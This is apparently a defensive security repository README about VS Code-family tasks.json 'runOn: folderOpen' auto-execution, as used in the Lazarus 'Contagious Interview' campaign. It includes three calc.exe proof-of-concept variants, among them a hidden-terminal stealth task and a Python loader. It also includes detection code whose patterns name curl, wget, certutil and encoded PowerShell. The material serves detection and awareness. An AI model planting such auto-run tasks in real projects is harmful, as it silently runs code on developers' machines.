A trusted workspace configuration file can execute arbitrary commands the moment you open a folder. No prompts. No warnings. No interaction required.
- Summary
- Affected Software
- How It Works
- Attack Variants
- Real-World Usage
- Impact Assessment
- Reproduction Steps
- Detection Methods
- Mitigation
- Are You Vulnerable?
- Scanner Tool
- FAQ
- References
- Disclaimer
VS Code and derivative IDEs (Cursor, Windsurf, and other Electron-based editors) support a tasks.json workspace configuration that can define tasks to run automatically when a folder is opened. By setting "runOn": "folderOpen" on a task, an attacker can achieve arbitrary command execution the instant a victim opens a malicious repository or project folder in their IDE. The victim does not need to click anything, run any command, or interact with the editor beyond opening the folder. This design feature has been actively exploited in the wild by the Lazarus Group (DPRK) as part of the "Contagious Interview" campaign, targeting developers through trojanized coding challenges and open-source repositories.
| IDE | Vulnerable | Notes |
|---|---|---|
| Visual Studio Code | Yes | Core feature since tasks API v2.0 |
| Cursor | Yes | Inherits VS Code task system |
| Windsurf (Codeium) | Yes | Inherits VS Code task system |
| Kiro (AWS) | Yes | VS Code-based; inherits task system |
| Antigravity (Google) | Yes | VS Code-based; inherits task system |
| VSCodium | Yes | Open-source VS Code fork |
| code-server | Yes | Browser-based VS Code |
| GitHub Codespaces | (see notes) | May have workspace trust mitigations |
| Any Electron IDE with VS Code task compat | If they implement the tasks.json spec | |
Platforms affected: Windows, macOS, Linux (all platforms where these IDEs run).
VS Code uses .vscode/tasks.json to define build tasks, linters, test runners, and other automation. This is a trusted workspace configuration that developers routinely include in repositories.
The "runOn": "folderOpen" property tells the IDE to execute a task automatically when the workspace is opened:
```text
Developer opens folder
        │
        ▼
IDE reads .vscode/tasks.json
        │
        ▼
Finds task with "runOn": "folderOpen"
        │
        ▼
Executes "command" in shell  →  ARBITRARY CODE EXECUTION
        │
        ▼
Attacker's payload runs with user privileges
```

- No user interaction: the command runs the instant the folder loads.
- Trusted file path: `.vscode/tasks.json` is a standard config file that developers expect to see in repos.
- Easily hidden: the task can be buried among legitimate build tasks.
- Full user privileges: the command runs as the current user, inheriting all their permissions.
- Cross-platform: different commands can be specified per OS (`windows`, `linux`, `osx` properties).
- Stealth options: the terminal output can be hidden using presentation settings.
The simplest form. Runs a command directly when the folder opens.
```json
// .vscode/tasks.json
{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "type": "shell",
      "command": "calc.exe",
      "runOptions": { "runOn": "folderOpen" }
    }
  ]
}
```

Detection difficulty: Easy. The command is plainly visible.
See: variants/1-basic/
Variant 2: Stealth (Hidden Terminal + OS-Specific Payload)
Hides the terminal panel and uses separate OS-specific commands. The command field shows a benign echo, while the real payload is in the OS-specific override.
```json
{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "initialize workspace",
      "type": "shell",
      "command": "echo 'Initializing project...'",
      "windows": {
        "command": "cmd /c start calc.exe"
      },
      "presentation": {
        "reveal": "never",
        "echo": false,
        "focus": false,
        "panel": "shared",
        "close": true
      },
      "runOptions": { "runOn": "folderOpen" }
    }
  ]
}
```

Detection difficulty: Medium. Requires checking OS-specific overrides and presentation settings.
See: variants/2-stealth/
The tasks.json calls a legitimate-looking script (e.g., a Python setup file) that contains the actual payload. This adds a layer of indirection that defeats simple tasks.json scanning.
```json
// tasks.json just runs a "setup" script
{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "setup environment",
      "type": "shell",
      "command": "python",
      "args": ["scripts/setup.py"],
      "runOptions": { "runOn": "folderOpen" }
    }
  ]
}
```

```python
# scripts/setup.py: looks legitimate but contains a payload
import platform
import subprocess


def setup_environment():
    """Configure project dependencies."""
    print("Setting up development environment...")
    # ... legitimate-looking code ...
    if platform.system() == "Windows":
        subprocess.Popen(["calc.exe"])  # Payload buried in setup logic


if __name__ == "__main__":
    setup_environment()
```

Detection difficulty: Hard. tasks.json looks benign; the payload is in a separate file.
See: variants/3-loader/
The North Korean APT group Lazarus (tracked as FAMOUS CHOLLIMA, UNC4899) has weaponized this technique as part of the "Contagious Interview" campaign:
- Target: Software developers, primarily those applying for jobs or contributing to open-source projects.
- Method: Victims receive a "coding challenge" or are directed to clone a trojanized GitHub repository. The repo contains a malicious `.vscode/tasks.json` that executes a payload on folder open.
- Payload chain: The initial task typically runs a script that downloads and executes further-stage malware (infostealers, RATs, cryptocurrency wallet drainers).
- Scale: Dozens of trojanized npm packages and GitHub repositories have been identified.
- Microsoft Threat Intelligence (Feb 2025): Documented FAMOUS CHOLLIMA using VS Code tasks.json in attacks targeting developers through fake job interviews.
- Abstract Security: Detailed analysis of the folderOpen execution mechanism and detection strategies.
- SecurityJoes / PaloAlto Unit42: Tracked the broader Contagious Interview campaign infrastructure.
| Factor | Rating |
|---|---|
| Ease of exploitation | Very Easy: just add a JSON file to a repo |
| User interaction required | None: opening the folder is sufficient |
| Privilege escalation | Runs as current user (often admin on dev machines) |
| Stealth potential | High: terminal can be hidden, payload can be delegated |
| Affected population | Millions of VS Code / Cursor / Windsurf users |
| Active exploitation | Yes: Lazarus Group / Contagious Interview |
- Execute any command as the current user
- Download and run additional malware
- Exfiltrate source code, credentials, SSH keys, browser data
- Install persistent backdoors
- Pivot to internal networks
- Steal cryptocurrency wallet keys
IMPORTANT: These steps use `calc.exe` (Windows Calculator) as a safe, harmless payload. Never test with real malware.

1. Create a new folder anywhere on your system:

   ```bash
   mkdir test-vuln && cd test-vuln
   mkdir .vscode
   ```

2. Create `.vscode/tasks.json` with this content:

   ```json
   {
     "version": "2.0.0",
     "tasks": [
       {
         "label": "build",
         "type": "shell",
         "command": "calc.exe",
         "runOptions": { "runOn": "folderOpen" }
       }
     ]
   }
   ```

3. Open the folder in VS Code / Cursor / Windsurf:

   ```bash
   code test-vuln
   ```

4. Result: Windows Calculator should open automatically without any user interaction beyond opening the folder.

- You may have Workspace Trust enabled (VS Code will show a trust prompt).
- Check `Settings > task.allowAutomaticTasks`: if set to `"off"`, auto-tasks are disabled.
- You previously dismissed the auto-task with "Never" for this workspace.
Use the PoCs in the variants/ directory. Each one is self-contained β just open the variant folder in your IDE.
Search for tasks.json files containing folderOpen:

```bash
# Linux/macOS
find /path/to/repos -path '*/.vscode/tasks.json' -exec grep -l 'folderOpen' {} \;
```

```powershell
# Windows PowerShell
Get-ChildItem -Path C:\repos -Recurse -Filter tasks.json |
    Where-Object { $_.FullName -match '\.vscode' } |
    Where-Object { (Get-Content $_.FullName -Raw) -match 'folderOpen' }
```

This repo includes a scanner that checks for malicious patterns:

```bash
python scanner/scan.py /path/to/check
```

See: Scanner Tool
Use the included YARA rules for file-level detection:
detection/yara_rules.yar
Use the included Sigma rule for log-based detection:
detection/sigma_rule.yml
Monitor for child processes spawned by VS Code / Cursor / Windsurf shell processes, particularly:

- `powershell.exe` or `pwsh.exe` with encoded commands
- `cmd.exe` spawning network utilities
- `python`/`node` running scripts from `.vscode`-adjacent paths
- Any process making network connections immediately after IDE launch
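The process-tree heuristics listed above, worked through as an added example (this is not the repository's Sigma rule or scanner). It reconstructs parent/child relationships from process-creation events, restricts attention to descendants of an IDE process, and then applies the indicators from the list: encoded PowerShell, network utilities, and script interpreters launched from the task shell. The events are constructed JSON lines with assumed field names (`pid`, `ppid`, `image`, `cmdline`); real EDR or Sysmon exports use different names, so the parser is the part you would adapt. The same `python scripts/setup.py` appears twice, once under the IDE tree and once outside it, to show that the ancestry check is what separates the two.

```python
import json

# Image names treated as IDE roots, shells and tools; these sets are this example's assumptions.
IDE_IMAGES = {"code.exe", "code", "cursor.exe", "cursor", "windsurf.exe", "windsurf", "code-server"}
POWERSHELL = {"powershell.exe", "pwsh.exe", "pwsh"}
NET_TOOLS = {"curl.exe", "curl", "wget", "certutil.exe", "bitsadmin.exe", "msiexec.exe"}
SCRIPT_HOSTS = {"python.exe", "python", "python3", "node.exe", "node"}
ENCODED_FLAGS = {"-encodedcommand", "-enc", "-ec", "-e"}

# Constructed process-creation events (JSON lines), not real telemetry. The base64 argument
# decodes to the word PLACEHOLDER; the URL uses the reserved .invalid TLD.
SAMPLE_LOG = r"""
{"pid": 900, "ppid": 1, "image": "C:\\Windows\\explorer.exe", "cmdline": "explorer.exe"}
{"pid": 4100, "ppid": 900, "image": "C:\\Users\\dev\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe", "cmdline": "Code.exe"}
{"pid": 4120, "ppid": 4100, "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe /d /c echo Initializing project..."}
{"pid": 4133, "ppid": 4120, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell.exe -NoP -W Hidden -EncodedCommand UExBQ0VIT0xERVI="}
{"pid": 4150, "ppid": 4120, "image": "C:\\Windows\\System32\\curl.exe", "cmdline": "curl.exe -s -o update.bin https://example.invalid/update"}
{"pid": 4160, "ppid": 4120, "image": "C:\\Python312\\python.exe", "cmdline": "python scripts/setup.py"}
{"pid": 5000, "ppid": 700, "image": "C:\\Python312\\python.exe", "cmdline": "python scripts/setup.py"}
"""


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_events(text: str) -> list[dict]:
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def has_ide_ancestor(event: dict, by_pid: dict) -> bool:
    """Walk ppid links upward looking for an IDE image; `seen` guards against pid-reuse loops."""
    seen, parent = set(), by_pid.get(event["ppid"])
    while parent is not None and parent["pid"] not in seen:
        if basename(parent["image"]) in IDE_IMAGES:
            return True
        seen.add(parent["pid"])
        parent = by_pid.get(parent["ppid"])
    return False


def indicators(event: dict) -> list[str]:
    """Per-process indicators from the page's monitoring list."""
    img = basename(event["image"])
    tokens = event.get("cmdline", "").lower().split()
    hits = []
    if img in POWERSHELL and any(t in ENCODED_FLAGS for t in tokens):
        hits.append("encoded PowerShell command")
    if img in NET_TOOLS:
        hits.append(f"network utility {img}")
    if img in SCRIPT_HOSTS:
        hits.append(f"script interpreter {img} started by IDE task shell")
    return hits


def detect(log_text: str) -> list[dict]:
    """Return alerts for IDE-descended processes that match at least one indicator."""
    events = parse_events(log_text)
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if not has_ide_ancestor(e, by_pid):
            continue  # the same binary outside the IDE tree is out of scope for this rule
        hits = indicators(e)
        if hits:
            alerts.append({"pid": e["pid"], "image": basename(e["image"]), "hits": hits})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

Running the block against the constructed log reports pids 4133, 4150 and 4160 and stays silent on 4120 (a plain `echo`) and on 5000 (the interpreter that was not started under the IDE).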
In VS Code / Cursor / Windsurf settings (settings.json):

```json
{
  "task.allowAutomaticTasks": "off"
}
```

Or via UI: Settings > search `task.allowAutomaticTasks` > set to `off`.

Ensure Workspace Trust is enabled (VS Code default):

```json
{
  "security.workspace.trust.enabled": true
}
```

This prompts you before trusting a new workspace. Do not blindly click "Trust" when opening unfamiliar repos.

Before opening any cloned repo in your IDE, check for .vscode/tasks.json:

```bash
cat .vscode/tasks.json 2>/dev/null || echo "No tasks.json found"
```

- Deploy the `task.allowAutomaticTasks: "off"` setting via Group Policy or MDM.
- Implement pre-commit hooks that flag `runOn: folderOpen` in tasks.json.
- Add YARA rules to endpoint detection.
- Train developers to recognize this attack vector.
- See: `mitigations/` for detailed enterprise guidance.
Run this quick check:
Open your IDE and go to Settings. Search for `task.allowAutomaticTasks`.

| Value | Status |
|---|---|
| `"off"` | Protected: auto-tasks will not run |
| `"on"` | Vulnerable: auto-tasks run without prompt |
| `"prompt"` (default in some versions) | Partially protected: you will be asked, but may click through |

Search for `security.workspace.trust.enabled` in Settings.

| Value | Status |
|---|---|
| `true` (default) | Partially protected: new folders require trust approval |
| `false` | Vulnerable: all folders are trusted automatically |
```bash
# Scan your projects directory for existing threats
python scanner/scan.py ~/projects
```

This repository includes a scanner in both Python and PowerShell.

```bash
# Scan a directory recursively
python scanner/scan.py /path/to/scan

# Examples
python scanner/scan.py ~/projects
python scanner/scan.py C:\Users\dev\repos
python scanner/scan.py .
```

The scanner checks for:

- `runOn: folderOpen` triggers
- Suspicious commands (`powershell -EncodedCommand`, `curl`, `wget`, `msiexec`, `Start-Process`, etc.)
- Mismatched `command` vs `windows.command`/`linux.command`/`osx.command` (stealth technique)
- Base64-encoded payloads
- Hidden presentation settings (`reveal: "never"`, `echo: false`)
- Script execution (Python, Node, Bash scripts called by tasks)

Output uses color-coded severity: SAFE, WARNING, DANGEROUS.
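The checks in the list above, and the pre-commit hook suggested under Mitigation, come down to the same static analysis of a tasks.json body. The following is an added example written for this page; it is not the repository's `scanner/scan.py`, and its token and runner lists are assumptions that mirror the description above rather than the real scanner's rules. Two details matter in practice: VS Code accepts comments and trailing commas in tasks.json, so the file is parsed as JSONC instead of handed straight to `json.loads`, and each OS override (`windows`, `linux`, `osx`) is analysed separately from the base `command`, which is what catches the stealth variant where the visible command is a harmless `echo`. The three variants from this page are embedded as constructed sample strings, together with one benign task, and each is classified with the page's SAFE / WARNING / DANGEROUS severities.

```python
import json
import re

OS_KEYS = ("windows", "linux", "osx")
# Token and runner lists are this example's assumptions, mirroring the page's scanner description.
SUSPICIOUS = ("-encodedcommand", "curl", "wget", "msiexec", "start-process", "invoke-expression")
SCRIPT_RUNNERS = {"python", "python3", "python.exe", "node", "node.exe", "bash", "sh", "pwsh", "powershell"}
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
AUTO_RUN = "auto-run: runOn=folderOpen"


def strip_jsonc(text: str) -> str:
    """Drop // and /* */ comments and trailing commas; VS Code accepts both, json.loads does not."""
    out, i, in_str = [], 0, False
    while i < len(text):
        c = text[i]
        if in_str:                                   # copy string bodies verbatim, honouring escapes
            out.append(c)
            if c == "\\" and i + 1 < len(text):
                out.append(text[i + 1])
                i += 1
            elif c == '"':
                in_str = False
        elif c == '"':
            in_str = True
            out.append(c)
        elif text.startswith("//", i):
            j = text.find("\n", i)
            i = len(text) if j == -1 else j
            continue
        elif text.startswith("/*", i):
            j = text.find("*/", i + 2)
            i = len(text) if j == -1 else j + 2
            continue
        else:
            out.append(c)
        i += 1
    return re.sub(r",(\s*[}\]])", r"\1", "".join(out))


def command_text(task: dict, os_key: str = "") -> str:
    """Flatten command + args of a task (or of one OS override) into one string."""
    src = task.get(os_key, {}) if os_key else task
    cmd = src.get("command", "")
    if isinstance(cmd, dict):                        # {"value": "...", "quoting": "..."} form
        cmd = cmd.get("value", "")
    args = [a if isinstance(a, str) else str(a.get("value", "")) for a in src.get("args", [])]
    return " ".join(p for p in [str(cmd), *args] if p)


def analyse_task(task: dict) -> list[str]:
    """Findings for one task; an empty list means the task does not auto-run."""
    if task.get("runOptions", {}).get("runOn") != "folderOpen":
        return []
    findings = [AUTO_RUN]
    pres = task.get("presentation", {})
    if pres.get("reveal") == "never" or pres.get("echo") is False:
        findings.append("hidden presentation (reveal=never / echo=false)")
    base = command_text(task)
    cmds = {"command": base}
    for key in OS_KEYS:                              # stealth variant: benign base, real payload per OS
        if key in task:
            cmds[key] = command_text(task, key)
            if cmds[key] and cmds[key] != base:
                findings.append(f"{key} override differs from command")
    for where, text in cmds.items():
        low = text.lower()
        findings += [f"suspicious token {tok!r} in {where}" for tok in SUSPICIOUS if tok in low]
        if B64_RE.search(text):
            findings.append(f"base64-like blob in {where}")
        first = low.split()[0].replace("\\", "/").rsplit("/", 1)[-1] if low.split() else ""
        if first in SCRIPT_RUNNERS:                  # loader variant: payload lives in a called script
            findings.append(f"script runner {first!r} in {where}")
    return findings


def severity(findings: list[str]) -> str:
    if not findings:
        return "SAFE"
    return "WARNING" if findings == [AUTO_RUN] else "DANGEROUS"


def scan_tasks_json(text: str) -> list[tuple[str, str, list[str]]]:
    """Parse one tasks.json body and return (label, severity, findings) per task."""
    data = json.loads(strip_jsonc(text))
    return [(t.get("label", "<unlabelled>"), severity(analyse_task(t)), analyse_task(t))
            for t in data.get("tasks", [])]


# Constructed samples: the three variants shown on this page plus one benign task.
SAMPLE_BASIC = '// .vscode/tasks.json\n{"version": "2.0.0", "tasks": [{"label": "build", "type": "shell", "command": "calc.exe", "runOptions": {"runOn": "folderOpen"}}]}'
SAMPLE_STEALTH = ('{"version": "2.0.0", "tasks": [{"label": "initialize workspace", "type": "shell", '
                  '"command": "echo \'Initializing project...\'", "windows": {"command": "cmd /c start calc.exe"}, '
                  '"presentation": {"reveal": "never", "echo": false, "focus": false, "panel": "shared", "close": true}, '
                  '"runOptions": {"runOn": "folderOpen"}}]}')
SAMPLE_LOADER = ('{"version": "2.0.0", "tasks": [{"label": "setup environment", "type": "shell", "command": "python", '
                 '"args": ["scripts/setup.py"], "runOptions": {"runOn": "folderOpen"}}]}')
SAMPLE_BENIGN = '{"version": "2.0.0", "tasks": [{"label": "test", "type": "shell", "command": "npm test"}]}'
```

Against the samples, the basic variant is rated WARNING (it auto-runs, but the command is in plain sight), the stealth and loader variants DANGEROUS, and the benign task SAFE. To use it on a checkout, read each `.vscode/tasks.json` and pass its contents to `scan_tasks_json`; a pre-commit hook would fail the commit on anything above SAFE.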
```powershell
.\scanner\scan.ps1 -Path C:\Users\dev\repos
```

Q: Is this a bug or a feature?
A: It is a feature β VS Code intentionally supports runOn: folderOpen for developer convenience. The security issue is that it enables a low-friction attack vector, especially in contexts where developers routinely clone and open untrusted repositories. Microsoft has added mitigations (Workspace Trust) but the underlying capability remains.
Q: Does Workspace Trust fully protect me?
A: Partially. If Workspace Trust is enabled (the default), VS Code will prompt you before trusting a new folder. However, many developers habitually click "Trust" without reviewing workspace configurations, and some users disable Workspace Trust entirely because of the frequent prompts.
Q: Can this attack be executed through a GitHub PR?
A: Yes. If a pull request adds or modifies .vscode/tasks.json and a reviewer checks out the PR branch and opens it in their IDE, the payload will execute.
Q: Are VS Code extensions involved?
A: No. This attack uses only built-in VS Code task functionality. No extensions are required.
Q: Why calc.exe?
A: calc.exe (Windows Calculator) is the standard benign payload for proof-of-concept demonstrations. It proves code execution without causing any harm. All PoCs in this repository use only calc.exe.
Q: Can this be used on macOS/Linux?
A: Yes. The command field runs in the system shell. On macOS you could use open -a Calculator, on Linux xcalc or any other command. The windows, linux, and osx properties allow OS-specific commands in a single tasks.json.
- Microsoft: FAMOUS CHOLLIMA targets developers with malicious VS Code projects (2025)
- Abstract Security: VS Code tasks.json folderOpen Attack Analysis
- MITRE ATT&CK T1204.001 β User Execution: Malicious Link
- MITRE ATT&CK T1059 β Command and Scripting Interpreter
- VS Code Tasks Documentation β runOn property
- Lazarus Group / Contagious Interview β CISA Advisory
- SecurityJoes β Contagious Interview Campaign Analysis
- Unit42 β DPRK IT Workers and Developer Targeting
This repository is provided strictly for educational and defensive security research purposes. The proof-of-concept demonstrations use only benign payloads (calc.exe) and are designed to raise awareness of this attack vector.
- Do not use these techniques for unauthorized access to systems.
- Do not modify these PoCs to include malicious payloads.
- The authors are not responsible for misuse of this information.
- All techniques documented here are based on publicly known, well-documented attack methods.
- If you discover this vulnerability being exploited in the wild, report it to the affected organization and relevant authorities.
Responsible Disclosure: This documents a known, publicly disclosed attack technique that has been actively exploited in the wild. Microsoft is aware of this capability and has implemented partial mitigations (Workspace Trust). The purpose of this repository is to help defenders detect and prevent these attacks.
Contributions are welcome! If you have:
- Additional detection rules (Splunk, ELK, etc.)
- Scanner improvements
- New attack variants discovered in the wild
- Mitigation strategies for other IDEs
Please open an issue or submit a pull request.
Created for the security research community. Stay safe, audit your workspaces.